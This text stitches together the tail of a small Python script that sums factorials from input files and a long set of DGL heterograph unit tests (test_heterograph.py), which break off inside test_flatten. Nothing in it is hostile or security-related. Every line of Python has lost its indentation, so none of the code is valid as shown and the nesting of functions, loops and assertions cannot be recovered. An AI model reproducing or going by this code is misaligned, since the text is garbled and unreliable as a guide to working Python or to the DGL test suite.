file_name = '%s%s.txt' % (INPUT_FILE_DIR, n)
print('Reading and processing file %s' % file_name)
total = 0
with open(file_name, 'r') as infile:
for l in infile:
total += math.factorial(int(l))
with open('%s%s.txt' % (INTERMEDIATE_RESULTS_PATH, n), 'w') as outfile:
outfile.write('%s\n' % total)
print('Thread %s just finished' % n)
if __name__ == '__main__':
main()
|
test_heterograph.py
|
import dgl
import dgl.function as fn
from collections import Counter
import numpy as np
import scipy.sparse as ssp
import itertools
import backend as F
import networkx as nx
import unittest, pytest
from dgl import DGLError
import test_utils
from test_utils import parametrize_dtype, get_cases
from utils import assert_is_identical_hetero
from scipy.sparse import rand
import multiprocessing as mp
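# Unit tests for DGL heterographs: construction from dicts/SciPy/NetworkX,
# structural queries, relation views, flattening, conversion to and from
# homogeneous graphs, device moves, memory pinning and subgraph extraction.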
def create_test_heterograph(idtype):
# test heterograph from the docstring, plus a user -- wishes -- game relation
# 3 users, 2 games, 2 developers
# metagraph:
# ('user', 'follows', 'user'),
# ('user', 'plays', 'game'),
# ('user', 'wishes', 'game'),
# ('developer', 'develops', 'game')])
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1], [1, 2]),
('user', 'plays', 'game'): ([0, 1, 2, 1], [0, 0, 1, 1]),
('user', 'wishes', 'game'): ([0, 2], [1, 0]),
('developer', 'develops', 'game'): ([0, 1], [0, 1])
}, idtype=idtype, device=F.ctx())
assert g.idtype == idtype
assert g.device == F.ctx()
return g
def create_test_heterograph1(idtype):
edges = []
edges.extend([(0, 1), (1, 2)]) # follows
edges.extend([(0, 3), (1, 3), (2, 4), (1, 4)]) # plays
edges.extend([(0, 4), (2, 3)]) # wishes
edges.extend([(5, 3), (6, 4)]) # develops
edges = tuple(zip(*edges))
ntypes = F.tensor([0, 0, 0, 1, 1, 2, 2])
etypes = F.tensor([0, 0, 1, 1, 1, 1, 2, 2, 3, 3])
g0 = dgl.graph(edges, idtype=idtype, device=F.ctx())
g0.ndata[dgl.NTYPE] = ntypes
g0.edata[dgl.ETYPE] = etypes
return dgl.to_heterogeneous(g0, ['user', 'game', 'developer'],
['follows', 'plays', 'wishes', 'develops'])
def create_test_heterograph2(idtype):
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1], [1, 2]),
('user', 'plays', 'game'): ([0, 1, 2, 1], [0, 0, 1, 1]),
('user', 'wishes', 'game'): ('csr', ([0, 1, 1, 2], [1, 0], [])),
('developer', 'develops', 'game'): ('csc', ([0, 1, 2], [0, 1], [0, 1])),
}, idtype=idtype, device=F.ctx())
assert g.idtype == idtype
assert g.device == F.ctx()
return g
def create_test_heterograph3(idtype):
g = dgl.heterograph({
('user', 'plays', 'game'): (F.tensor([0, 1, 1, 2], dtype=idtype),
F.tensor([0, 0, 1, 1], dtype=idtype)),
('developer', 'develops', 'game'): (F.tensor([0, 1], dtype=idtype),
F.tensor([0, 1], dtype=idtype))},
idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.copy_to(F.tensor([1, 1, 1], dtype=idtype), ctx=F.ctx())
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())
g.nodes['developer'].data['h'] = F.copy_to(F.tensor([3, 3], dtype=idtype), ctx=F.ctx())
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 1, 1, 1], dtype=idtype), ctx=F.ctx())
return g
def create_test_heterograph4(idtype):
g = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([0, 1, 1, 2, 2, 2], dtype=idtype),
F.tensor([0, 0, 1, 1, 2, 2], dtype=idtype)),
('user', 'plays', 'game'): (F.tensor([0, 1], dtype=idtype),
F.tensor([0, 1], dtype=idtype))},
idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.copy_to(F.tensor([1, 1, 1], dtype=idtype), ctx=F.ctx())
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())
g.edges['follows'].data['h'] = F.copy_to(F.tensor([1, 2, 3, 4, 5, 6], dtype=idtype), ctx=F.ctx())
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 2], dtype=idtype), ctx=F.ctx())
return g
def create_test_heterograph5(idtype):
g = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([1, 2], dtype=idtype),
F.tensor([0, 1], dtype=idtype)),
('user', 'plays', 'game'): (F.tensor([0, 1], dtype=idtype),
F.tensor([0, 1], dtype=idtype))},
idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.copy_to(F.tensor([1, 1, 1], dtype=idtype), ctx=F.ctx())
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())
g.edges['follows'].data['h'] = F.copy_to(F.tensor([1, 2], dtype=idtype), ctx=F.ctx())
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 2], dtype=idtype), ctx=F.ctx())
return g
def get_redfn(name):
return getattr(F, name)
@parametrize_dtype
def test_create(idtype):
device = F.ctx()
g0 = create_test_heterograph(idtype)
g1 = create_test_heterograph1(idtype)
g2 = create_test_heterograph2(idtype)
assert set(g0.ntypes) == set(g1.ntypes) == set(g2.ntypes)
assert set(g0.canonical_etypes) == set(g1.canonical_etypes) == set(g2.canonical_etypes)
# Create a bipartite graph from a SciPy matrix
src_ids = np.array([2, 3, 4])
dst_ids = np.array([1, 2, 3])
eweight = np.array([0.2, 0.3, 0.5])
sp_mat = ssp.coo_matrix((eweight, (src_ids, dst_ids)))
g = dgl.bipartite_from_scipy(sp_mat, utype='user', etype='plays',
vtype='game', idtype=idtype, device=device)
assert g.idtype == idtype
assert g.device == device
assert g.num_src_nodes() == 5
assert g.num_dst_nodes() == 4
assert g.num_edges() == 3
src, dst = g.edges()
assert F.allclose(src, F.tensor([2, 3, 4], dtype=idtype))
assert F.allclose(dst, F.tensor([1, 2, 3], dtype=idtype))
g = dgl.bipartite_from_scipy(sp_mat, utype='_U', etype='_E', vtype='_V',
eweight_name='w', idtype=idtype, device=device)
assert F.allclose(g.edata['w'], F.tensor(eweight))
# Create a bipartite graph from a NetworkX graph
nx_g = nx.DiGraph()
nx_g.add_nodes_from([1, 3], bipartite=0, feat1=np.zeros((2)), feat2=np.ones((2)))
nx_g.add_nodes_from([2, 4, 5], bipartite=1, feat3=np.zeros((3)))
nx_g.add_edge(1, 4, weight=np.ones((1)), eid=np.array([1]))
nx_g.add_edge(3, 5, weight=np.ones((1)), eid=np.array([0]))
g = dgl.bipartite_from_networkx(nx_g, utype='user', etype='plays',
vtype='game', idtype=idtype, device=device)
assert g.idtype == idtype
assert g.device == device
assert g.num_src_nodes() == 2
assert g.num_dst_nodes() == 3
assert g.num_edges() == 2
src, dst = g.edges()
assert F.allclose(src, F.tensor([0, 1], dtype=idtype))
assert F.allclose(dst, F.tensor([1, 2], dtype=idtype))
g = dgl.bipartite_from_networkx(nx_g, utype='_U', etype='_E', vtype='V',
u_attrs=['feat1', 'feat2'],
e_attrs = ['weight'], v_attrs = ['feat3'])
assert F.allclose(g.srcdata['feat1'], F.tensor(np.zeros((2, 2))))
assert F.allclose(g.srcdata['feat2'], F.tensor(np.ones((2, 2))))
assert F.allclose(g.dstdata['feat3'], F.tensor(np.zeros((3, 3))))
assert F.allclose(g.edata['weight'], F.tensor(np.ones((2, 1))))
g = dgl.bipartite_from_networkx(nx_g, utype='_U', etype='_E', vtype='V',
edge_id_attr_name='eid', idtype=idtype, device=device)
src, dst = g.edges()
assert F.allclose(src, F.tensor([1, 0], dtype=idtype))
assert F.allclose(dst, F.tensor([2, 1], dtype=idtype))
# create from scipy
spmat = ssp.coo_matrix(([1,1,1], ([0, 0, 1], [2, 3, 2])), shape=(4, 4))
g = dgl.from_scipy(spmat, idtype=idtype, device=device)
assert g.num_nodes() == 4
assert g.num_edges() == 3
assert g.idtype == idtype
assert g.device == device
# test inferring number of nodes for heterograph
g = dgl.heterograph({
('l0', 'e0', 'l1'): ([0, 0], [1, 2]),
('l0', 'e1', 'l2'): ([2], [2]),
('l2', 'e2', 'l2'): ([1, 3], [1, 3])
}, idtype=idtype, device=device)
assert g.num_nodes('l0') == 3
assert g.num_nodes('l1') == 3
assert g.num_nodes('l2') == 4
assert g.idtype == idtype
assert g.device == device
# test if validate flag works
# homo graph
with pytest.raises(DGLError):
g = dgl.graph(
([0, 0, 0, 1, 1, 2], [0, 1, 2, 0, 1, 2]),
num_nodes=2,
idtype=idtype, device=device
)
# bipartite graph
def _test_validate_bipartite(card):
with pytest.raises(DGLError):
g = dgl.heterograph({
('_U', '_E', '_V'): ([0, 0, 1, 1, 2], [1, 1, 2, 2, 3])
}, {'_U': card[0], '_V': card[1]}, idtype=idtype, device=device)
_test_validate_bipartite((3, 3))
_test_validate_bipartite((2, 4))
# test from_scipy
num_nodes = 10
density = 0.25
for fmt in ['csr', 'coo', 'csc']:
adj = rand(num_nodes, num_nodes, density=density, format=fmt)
g = dgl.from_scipy(adj, eweight_name='w', idtype=idtype)
assert g.idtype == idtype
assert g.device == F.cpu()
assert F.array_equal(g.edata['w'], F.copy_to(F.tensor(adj.data), F.cpu()))
def test_create2():
mat = ssp.random(20, 30, 0.1)
# coo
mat = mat.tocoo()
row = F.tensor(mat.row, dtype=F.int64)
col = F.tensor(mat.col, dtype=F.int64)
g = dgl.heterograph(
{('A', 'AB', 'B'): ('coo', (row, col))}, num_nodes_dict={'A': 20, 'B': 30})
# csr
mat = mat.tocsr()
indptr = F.tensor(mat.indptr, dtype=F.int64)
indices = F.tensor(mat.indices, dtype=F.int64)
data = F.tensor([], dtype=F.int64)
g = dgl.heterograph(
{('A', 'AB', 'B'): ('csr', (indptr, indices, data))}, num_nodes_dict={'A': 20, 'B': 30})
# csc
mat = mat.tocsc()
indptr = F.tensor(mat.indptr, dtype=F.int64)
indices = F.tensor(mat.indices, dtype=F.int64)
data = F.tensor([], dtype=F.int64)
g = dgl.heterograph(
{('A', 'AB', 'B'): ('csc', (indptr, indices, data))}, num_nodes_dict={'A': 20, 'B': 30})
@parametrize_dtype
def test_query(idtype):
g = create_test_heterograph(idtype)
ntypes = ['user', 'game', 'developer']
canonical_etypes = [
('user', 'follows', 'user'),
('user', 'plays', 'game'),
('user', 'wishes', 'game'),
('developer', 'develops', 'game')]
etypes = ['follows', 'plays', 'wishes', 'develops']
# node & edge types
assert set(ntypes) == set(g.ntypes)
assert set(etypes) == set(g.etypes)
assert set(canonical_etypes) == set(g.canonical_etypes)
# metagraph
mg = g.metagraph()
assert set(g.ntypes) == set(mg.nodes)
etype_triplets = [(u, v, e) for u, v, e in mg.edges(keys=True)]
assert set([
('user', 'user', 'follows'),
('user', 'game', 'plays'),
('user', 'game', 'wishes'),
('developer', 'game', 'develops')]) == set(etype_triplets)
for i in range(len(etypes)):
assert g.to_canonical_etype(etypes[i]) == canonical_etypes[i]
def _test(g):
# number of nodes
assert [g.num_nodes(ntype) for ntype in ntypes] == [3, 2, 2]
# number of edges
assert [g.num_edges(etype) for etype in etypes] == [2, 4, 2, 2]
# has_node & has_nodes
for ntype in ntypes:
n = g.number_of_nodes(ntype)
for i in range(n):
assert g.has_node(i, ntype)
assert not g.has_node(n, ntype)
assert np.array_equal(
F.asnumpy(g.has_nodes([0, n], ntype)).astype('int32'), [1, 0])
assert not g.is_multigraph
for etype in etypes:
srcs, dsts = edges[etype]
for src, dst in zip(srcs, dsts):
assert g.has_edges_between(src, dst, etype)
assert F.asnumpy(g.has_edges_between(srcs, dsts, etype)).all()
srcs, dsts = negative_edges[etype]
for src, dst in zip(srcs, dsts):
assert not g.has_edges_between(src, dst, etype)
assert not F.asnumpy(g.has_edges_between(srcs, dsts, etype)).any()
srcs, dsts = edges[etype]
n_edges = len(srcs)
# predecessors & in_edges & in_degree
pred = [s for s, d in zip(srcs, dsts) if d == 0]
assert set(F.asnumpy(g.predecessors(0, etype)).tolist()) == set(pred)
u, v = g.in_edges([0], etype=etype)
assert F.asnumpy(v).tolist() == [0] * len(pred)
assert set(F.asnumpy(u).tolist()) == set(pred)
assert g.in_degrees(0, etype) == len(pred)
# successors & out_edges & out_degree
succ = [d for s, d in zip(srcs, dsts) if s == 0]
assert set(F.asnumpy(g.successors(0, etype)).tolist()) == set(succ)
u, v = g.out_edges([0], etype=etype)
assert F.asnumpy(u).tolist() == [0] * len(succ)
assert set(F.asnumpy(v).tolist()) == set(succ)
assert g.out_degrees(0, etype) == len(succ)
# edge_id & edge_ids
for i, (src, dst) in enumerate(zip(srcs, dsts)):
assert g.edge_ids(src, dst, etype=etype) == i
_, _, eid = g.edge_ids(src, dst, etype=etype, return_uv=True)
assert eid == i
assert F.asnumpy(g.edge_ids(srcs, dsts, etype=etype)).tolist() == list(range(n_edges))
u, v, e = g.edge_ids(srcs, dsts, etype=etype, return_uv=True)
u, v, e = F.asnumpy(u), F.asnumpy(v), F.asnumpy(e)
assert u[e].tolist() == srcs
assert v[e].tolist() == dsts
# find_edges
for eid in [list(range(n_edges)), np.arange(n_edges), F.astype(F.arange(0, n_edges), g.idtype)]:
u, v = g.find_edges(eid, etype)
assert F.asnumpy(u).tolist() == srcs
assert F.asnumpy(v).tolist() == dsts
# all_edges.
for order in ['eid']:
u, v, e = g.edges('all', order, etype)
assert F.asnumpy(u).tolist() == srcs
assert F.asnumpy(v).tolist() == dsts
assert F.asnumpy(e).tolist() == list(range(n_edges))
# in_degrees & out_degrees
in_degrees = F.asnumpy(g.in_degrees(etype=etype))
out_degrees = F.asnumpy(g.out_degrees(etype=etype))
src_count = Counter(srcs)
dst_count = Counter(dsts)
utype, _, vtype = g.to_canonical_etype(etype)
for i in range(g.number_of_nodes(utype)):
assert out_degrees[i] == src_count[i]
for i in range(g.number_of_nodes(vtype)):
assert in_degrees[i] == dst_count[i]
edges = {
'follows': ([0, 1], [1, 2]),
'plays': ([0, 1, 2, 1], [0, 0, 1, 1]),
'wishes': ([0, 2], [1, 0]),
'develops': ([0, 1], [0, 1]),
}
# edges that do not exist in the graph
negative_edges = {
'follows': ([0, 1], [0, 1]),
'plays': ([0, 2], [1, 0]),
'wishes': ([0, 1], [0, 1]),
'develops': ([0, 1], [1, 0]),
}
g = create_test_heterograph(idtype)
_test(g)
g = create_test_heterograph1(idtype)
_test(g)
if F._default_context_str != 'gpu':
# XXX: CUDA COO operators are not available yet.
g = create_test_heterograph2(idtype)
_test(g)
etypes = canonical_etypes
edges = {
('user', 'follows', 'user'): ([0, 1], [1, 2]),
('user', 'plays', 'game'): ([0, 1, 2, 1], [0, 0, 1, 1]),
('user', 'wishes', 'game'): ([0, 2], [1, 0]),
('developer', 'develops', 'game'): ([0, 1], [0, 1]),
}
# edges that do not exist in the graph
negative_edges = {
('user', 'follows', 'user'): ([0, 1], [0, 1]),
('user', 'plays', 'game'): ([0, 2], [1, 0]),
('user', 'wishes', 'game'): ([0, 1], [0, 1]),
('developer', 'develops', 'game'): ([0, 1], [1, 0]),
}
g = create_test_heterograph(idtype)
_test(g)
g = create_test_heterograph1(idtype)
_test(g)
if F._default_context_str != 'gpu':
# XXX: CUDA COO operators are not available yet.
g = create_test_heterograph2(idtype)
_test(g)
# test repr
print(g)
@parametrize_dtype
def test_empty_query(idtype):
g = dgl.graph(([1, 2, 3], [0, 4, 5]), idtype=idtype, device=F.ctx())
g.add_nodes(0)
g.add_edges([], [])
g.remove_edges([])
g.remove_nodes([])
assert F.shape(g.has_nodes([])) == (0,)
assert F.shape(g.has_edges_between([], [])) == (0,)
g.edge_ids([], [])
g.edge_ids([], [], return_uv=True)
g.find_edges([])
assert F.shape(g.in_edges([], form='eid')) == (0,)
u, v = g.in_edges([], form='uv')
assert F.shape(u) == (0,)
assert F.shape(v) == (0,)
u, v, e = g.in_edges([], form='all')
assert F.shape(u) == (0,)
assert F.shape(v) == (0,)
assert F.shape(e) == (0,)
assert F.shape(g.out_edges([], form='eid')) == (0,)
u, v = g.out_edges([], form='uv')
assert F.shape(u) == (0,)
assert F.shape(v) == (0,)
u, v, e = g.out_edges([], form='all')
assert F.shape(u) == (0,)
assert F.shape(v) == (0,)
assert F.shape(e) == (0,)
assert F.shape(g.in_degrees([])) == (0,)
assert F.shape(g.out_degrees([])) == (0,)
@unittest.skipIf(F._default_context_str == 'gpu', reason="GPU does not have COO impl.")
def _test_hypersparse():
N1 = 1 << 50 # should crash if allocated a CSR
N2 = 1 << 48
g = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([0], F.int64), F.tensor([1], F.int64)),
('user', 'plays', 'game'): (F.tensor([0], F.int64), F.tensor([N2], F.int64))},
{'user': N1, 'game': N1},
device=F.ctx())
assert g.number_of_nodes('user') == N1
assert g.number_of_nodes('game') == N1
assert g.number_of_edges('follows') == 1
assert g.number_of_edges('plays') == 1
assert g.has_edges_between(0, 1, 'follows')
assert not g.has_edges_between(0, 0, 'follows')
mask = F.asnumpy(g.has_edges_between([0, 0], [0, 1], 'follows')).tolist()
assert mask == [0, 1]
assert g.has_edges_between(0, N2, 'plays')
assert not g.has_edges_between(0, 0, 'plays')
mask = F.asnumpy(g.has_edges_between([0, 0], [0, N2], 'plays')).tolist()
assert mask == [0, 1]
assert F.asnumpy(g.predecessors(0, 'follows')).tolist() == []
assert F.asnumpy(g.successors(0, 'follows')).tolist() == [1]
assert F.asnumpy(g.predecessors(1, 'follows')).tolist() == [0]
assert F.asnumpy(g.successors(1, 'follows')).tolist() == []
assert F.asnumpy(g.predecessors(0, 'plays')).tolist() == []
assert F.asnumpy(g.successors(0, 'plays')).tolist() == [N2]
assert F.asnumpy(g.predecessors(N2, 'plays')).tolist() == [0]
assert F.asnumpy(g.successors(N2, 'plays')).tolist() == []
assert g.edge_ids(0, 1, etype='follows') == 0
assert g.edge_ids(0, N2, etype='plays') == 0
u, v = g.find_edges([0], 'follows')
assert F.asnumpy(u).tolist() == [0]
assert F.asnumpy(v).tolist() == [1]
u, v = g.find_edges([0], 'plays')
assert F.asnumpy(u).tolist() == [0]
assert F.asnumpy(v).tolist() == [N2]
u, v, e = g.all_edges('all', 'eid', 'follows')
assert F.asnumpy(u).tolist() == [0]
assert F.asnumpy(v).tolist() == [1]
assert F.asnumpy(e).tolist() == [0]
u, v, e = g.all_edges('all', 'eid', 'plays')
assert F.asnumpy(u).tolist() == [0]
assert F.asnumpy(v).tolist() == [N2]
assert F.asnumpy(e).tolist() == [0]
assert g.in_degrees(0, 'follows') == 0
assert g.in_degrees(1, 'follows') == 1
assert F.asnumpy(g.in_degrees([0, 1], 'follows')).tolist() == [0, 1]
assert g.in_degrees(0, 'plays') == 0
assert g.in_degrees(N2, 'plays') == 1
assert F.asnumpy(g.in_degrees([0, N2], 'plays')).tolist() == [0, 1]
assert g.out_degrees(0, 'follows') == 1
assert g.out_degrees(1, 'follows') == 0
assert F.asnumpy(g.out_degrees([0, 1], 'follows')).tolist() == [1, 0]
assert g.out_degrees(0, 'plays') == 1
assert g.out_degrees(N2, 'plays') == 0
assert F.asnumpy(g.out_degrees([0, N2], 'plays')).tolist() == [1, 0]
def _test_edge_ids():
N1 = 1 << 50 # should crash if allocated a CSR
N2 = 1 << 48
g = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([0], F.int64), F.tensor([1], F.int64)),
('user', 'plays', 'game'): (F.tensor([0], F.int64), F.tensor([N2], F.int64))},
{'user': N1, 'game': N1})
with pytest.raises(DGLError):
eid = g.edge_ids(0, 0, etype='follows')
g2 = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([0, 0], F.int64), F.tensor([1, 1], F.int64)),
('user', 'plays', 'game'): (F.tensor([0], F.int64), F.tensor([N2], F.int64))},
{'user': N1, 'game': N1}, device=F.cpu())
eid = g2.edge_ids(0, 1, etype='follows')
assert eid == 0
@parametrize_dtype
def test_adj(idtype):
g = create_test_heterograph(idtype)
adj = F.sparse_to_numpy(g.adj(transpose=True, etype='follows'))
assert np.allclose(
adj,
np.array([[0., 0., 0.],
[1., 0., 0.],
[0., 1., 0.]]))
adj = F.sparse_to_numpy(g.adj(transpose=False, etype='follows'))
assert np.allclose(
adj,
np.array([[0., 1., 0.],
[0., 0., 1.],
[0., 0., 0.]]))
adj = F.sparse_to_numpy(g.adj(transpose=True, etype='plays'))
assert np.allclose(
adj,
np.array([[1., 1., 0.],
[0., 1., 1.]]))
adj = F.sparse_to_numpy(g.adj(transpose=False, etype='plays'))
assert np.allclose(
adj,
np.array([[1., 0.],
[1., 1.],
[0., 1.]]))
adj = g.adj(transpose=True, scipy_fmt='csr', etype='follows')
assert np.allclose(
adj.todense(),
np.array([[0., 0., 0.],
[1., 0., 0.],
[0., 1., 0.]]))
adj = g.adj(transpose=True, scipy_fmt='coo', etype='follows')
assert np.allclose(
adj.todense(),
np.array([[0., 0., 0.],
[1., 0., 0.],
[0., 1., 0.]]))
adj = g.adj(transpose=True, scipy_fmt='csr', etype='plays')
assert np.allclose(
adj.todense(),
np.array([[1., 1., 0.],
[0., 1., 1.]]))
adj = g.adj(transpose=True, scipy_fmt='coo', etype='plays')
assert np.allclose(
adj.todense(),
np.array([[1., 1., 0.],
[0., 1., 1.]]))
adj = F.sparse_to_numpy(g['follows'].adj(transpose=True))
assert np.allclose(
adj,
np.array([[0., 0., 0.],
[1., 0., 0.],
[0., 1., 0.]]))
@parametrize_dtype
def test_inc(idtype):
g = create_test_heterograph(idtype)
adj = F.sparse_to_numpy(g['follows'].inc('in'))
assert np.allclose(
adj,
np.array([[0., 0.],
[1., 0.],
[0., 1.]]))
adj = F.sparse_to_numpy(g['follows'].inc('out'))
assert np.allclose(
adj,
np.array([[1., 0.],
[0., 1.],
[0., 0.]]))
adj = F.sparse_to_numpy(g['follows'].inc('both'))
assert np.allclose(
adj,
np.array([[-1., 0.],
[1., -1.],
[0., 1.]]))
adj = F.sparse_to_numpy(g.inc('in', etype='plays'))
assert np.allclose(
adj,
np.array([[1., 1., 0., 0.],
[0., 0., 1., 1.]]))
adj = F.sparse_to_numpy(g.inc('out', etype='plays'))
assert np.allclose(
adj,
np.array([[1., 0., 0., 0.],
[0., 1., 0., 1.],
[0., 0., 1., 0.]]))
adj = F.sparse_to_numpy(g.inc('both', etype='follows'))
assert np.allclose(
adj,
np.array([[-1., 0.],
[1., -1.],
[0., 1.]]))
@parametrize_dtype
def test_view(idtype):
# test single node type
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1], [1, 2])
}, idtype=idtype, device=F.ctx())
f1 = F.randn((3, 6))
g.ndata['h'] = f1
f2 = g.nodes['user'].data['h']
assert F.array_equal(f1, f2)
fail = False
try:
g.ndata['h'] = {'user' : f1}
except Exception:
fail = True
assert fail
# test single edge type
f3 = F.randn((2, 4))
g.edata['h'] = f3
f4 = g.edges['follows'].data['h']
assert F.array_equal(f3, f4)
fail = False
try:
g.edata['h'] = {'follows' : f3}
except Exception:
fail = True
assert fail
# test data view
g = create_test_heterograph(idtype)
f1 = F.randn((3, 6))
g.nodes['user'].data['h'] = f1 # ok
f2 = g.nodes['user'].data['h']
assert F.array_equal(f1, f2)
assert F.array_equal(g.nodes('user'), F.arange(0, 3, idtype))
g.nodes['user'].data.pop('h')
# multi type ndata
f1 = F.randn((3, 6))
f2 = F.randn((2, 6))
fail = False
try:
g.ndata['h'] = f1
except Exception:
fail = True
assert fail
f3 = F.randn((2, 4))
g.edges['user', 'follows', 'user'].data['h'] = f3
f4 = g.edges['user', 'follows', 'user'].data['h']
f5 = g.edges['follows'].data['h']
assert F.array_equal(f3, f4)
assert F.array_equal(f3, f5)
assert F.array_equal(g.edges(etype='follows', form='eid'), F.arange(0, 2, idtype))
g.edges['follows'].data.pop('h')
f3 = F.randn((2, 4))
fail = False
try:
g.edata['h'] = f3
except Exception:
fail = True
assert fail
# test srcdata
f1 = F.randn((3, 6))
g.srcnodes['user'].data['h'] = f1 # ok
f2 = g.srcnodes['user'].data['h']
assert F.array_equal(f1, f2)
assert F.array_equal(g.srcnodes('user'), F.arange(0, 3, idtype))
g.srcnodes['user'].data.pop('h')
# test dstdata
f1 = F.randn((3, 6))
g.dstnodes['user'].data['h'] = f1 # ok
f2 = g.dstnodes['user'].data['h']
assert F.array_equal(f1, f2)
assert F.array_equal(g.dstnodes('user'), F.arange(0, 3, idtype))
g.dstnodes['user'].data.pop('h')
@parametrize_dtype
def test_view1(idtype):
# test relation view
HG = create_test_heterograph(idtype)
ntypes = ['user', 'game', 'developer']
canonical_etypes = [
('user', 'follows', 'user'),
('user', 'plays', 'game'),
('user', 'wishes', 'game'),
('developer', 'develops', 'game')]
etypes = ['follows', 'plays', 'wishes', 'develops']
def _test_query():
for etype in etypes:
utype, _, vtype = HG.to_canonical_etype(etype)
g = HG[etype]
srcs, dsts = edges[etype]
for src, dst in zip(srcs, dsts):
assert g.has_edges_between(src, dst)
assert F.asnumpy(g.has_edges_between(srcs, dsts)).all()
srcs, dsts = negative_edges[etype]
for src, dst in zip(srcs, dsts):
assert not g.has_edges_between(src, dst)
assert not F.asnumpy(g.has_edges_between(srcs, dsts)).any()
srcs, dsts = edges[etype]
n_edges = len(srcs)
# predecessors & in_edges & in_degree
pred = [s for s, d in zip(srcs, dsts) if d == 0]
assert set(F.asnumpy(g.predecessors(0)).tolist()) == set(pred)
u, v = g.in_edges([0])
assert F.asnumpy(v).tolist() == [0] * len(pred)
assert set(F.asnumpy(u).tolist()) == set(pred)
assert g.in_degrees(0) == len(pred)
# successors & out_edges & out_degree
succ = [d for s, d in zip(srcs, dsts) if s == 0]
assert set(F.asnumpy(g.successors(0)).tolist()) == set(succ)
u, v = g.out_edges([0])
assert F.asnumpy(u).tolist() == [0] * len(succ)
assert set(F.asnumpy(v).tolist()) == set(succ)
assert g.out_degrees(0) == len(succ)
# edge_id & edge_ids
for i, (src, dst) in enumerate(zip(srcs, dsts)):
assert g.edge_ids(src, dst, etype=etype) == i
_, _, eid = g.edge_ids(src, dst, etype=etype, return_uv=True)
assert eid == i
assert F.asnumpy(g.edge_ids(srcs, dsts)).tolist() == list(range(n_edges))
u, v, e = g.edge_ids(srcs, dsts, return_uv=True)
u, v, e = F.asnumpy(u), F.asnumpy(v), F.asnumpy(e)
assert u[e].tolist() == srcs
assert v[e].tolist() == dsts
# find_edges
u, v = g.find_edges(list(range(n_edges)))
assert F.asnumpy(u).tolist() == srcs
assert F.asnumpy(v).tolist() == dsts
# all_edges.
for order in ['eid']:
u, v, e = g.all_edges(form='all', order=order)
assert F.asnumpy(u).tolist() == srcs
assert F.asnumpy(v).tolist() == dsts
assert F.asnumpy(e).tolist() == list(range(n_edges))
# in_degrees & out_degrees
in_degrees = F.asnumpy(g.in_degrees())
out_degrees = F.asnumpy(g.out_degrees())
src_count = Counter(srcs)
dst_count = Counter(dsts)
for i in range(g.number_of_nodes(utype)):
assert out_degrees[i] == src_count[i]
for i in range(g.number_of_nodes(vtype)):
assert in_degrees[i] == dst_count[i]
edges = {
'follows': ([0, 1], [1, 2]),
'plays': ([0, 1, 2, 1], [0, 0, 1, 1]),
'wishes': ([0, 2], [1, 0]),
'develops': ([0, 1], [0, 1]),
}
# edges that do not exist in the graph
negative_edges = {
'follows': ([0, 1], [0, 1]),
'plays': ([0, 2], [1, 0]),
'wishes': ([0, 1], [0, 1]),
'develops': ([0, 1], [1, 0]),
}
_test_query()
etypes = canonical_etypes
edges = {
('user', 'follows', 'user'): ([0, 1], [1, 2]),
('user', 'plays', 'game'): ([0, 1, 2, 1], [0, 0, 1, 1]),
('user', 'wishes', 'game'): ([0, 2], [1, 0]),
('developer', 'develops', 'game'): ([0, 1], [0, 1]),
}
# edges that do not exist in the graph
negative_edges = {
('user', 'follows', 'user'): ([0, 1], [0, 1]),
('user', 'plays', 'game'): ([0, 2], [1, 0]),
('user', 'wishes', 'game'): ([0, 1], [0, 1]),
('developer', 'develops', 'game'): ([0, 1], [1, 0]),
}
_test_query()
# test features
HG.nodes['user'].data['h'] = F.ones((HG.number_of_nodes('user'), 5))
HG.nodes['game'].data['m'] = F.ones((HG.number_of_nodes('game'), 3)) * 2
# test only one node type
g = HG['follows']
assert g.number_of_nodes() == 3
# test ndata and edata
f1 = F.randn((3, 6))
g.ndata['h'] = f1 # ok
f2 = HG.nodes['user'].data['h']
assert F.array_equal(f1, f2)
assert F.array_equal(g.nodes(), F.arange(0, 3, g.idtype))
f3 = F.randn((2, 4))
g.edata['h'] = f3
f4 = HG.edges['follows'].data['h']
assert F.array_equal(f3, f4)
assert F.array_equal(g.edges(form='eid'), F.arange(0, 2, g.idtype))
@parametrize_dtype
def test_flatten(idtype):
def check_mapping(g, fg):
if len(fg.ntypes) == 1:
SRC = DST = fg.ntypes[0]
else:
SRC = fg.ntypes[0]
DST = fg.ntypes[1]
etypes = F.asnumpy(fg.edata[dgl.ETYPE]).tolist()
eids = F.asnumpy(fg.edata[dgl.EID]).tolist()
for i, (etype, eid) in enumerate(zip(etypes, eids)):
src_g, dst_g = g.find_edges([eid], g.canonical_etypes[etype])
src_fg, dst_fg = fg.find_edges([i])
# TODO(gq): I feel this code is quite redundant; can we just add new members (like
# "induced_srcid") to returned heterograph object and not store them as features?
assert F.asnumpy(src_g) == F.asnumpy(F.gather_row(fg.nodes[SRC].data[dgl.NID], src_fg)[0])
tid = F.asnumpy(F.gather_row(fg.nodes[SRC].data[dgl.NTYPE], src_fg)).item()
assert g.canonical_etypes[etype][0] == g.ntypes[tid]
assert F.asnumpy(dst_g) == F.asnumpy(F.gather_row(fg.nodes[DST].data[dgl.NID], dst_fg)[0])
tid = F.asnumpy(F.gather_row(fg.nodes[DST].data[dgl.NTYPE], dst_fg)).item()
assert g.canonical_etypes[etype][2] == g.ntypes[tid]
# check for wildcard slices
g = create_test_heterograph(idtype)
g.nodes['user'].data['h'] = F.ones((3, 5))
